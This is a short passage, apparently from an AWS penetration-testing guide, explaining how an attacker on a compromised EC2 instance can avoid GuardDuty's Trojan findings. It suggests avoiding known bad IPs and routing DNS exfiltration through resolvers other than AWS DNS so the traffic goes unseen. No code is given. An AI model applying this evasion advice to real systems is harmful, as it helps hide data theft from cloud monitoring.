Most of the findings within the Trojan category of GuardDuty can be avoided by never communicating with known bad IP addresses and domains, which is easy to do. However, one finding, Trojan:EC2/DNSDataExfiltration, is a bit different. This finding triggers when an EC2 instance is discovered to be exfiltrating data through DNS queries. To avoid this, we can simply decide against the method of DNS data exfiltration when within a compromised EC2 instance.

Also, as discussed previously, GuardDuty can only read DNS logs for DNS requests that use the AWS DNS servers. It might be possible to customize your malware to use alternate DNS resolvers (other than the EC2 default of AWS DNS) for your DNS exfiltration, which will completely bypass GuardDuty, because the traffic will never be seen by it.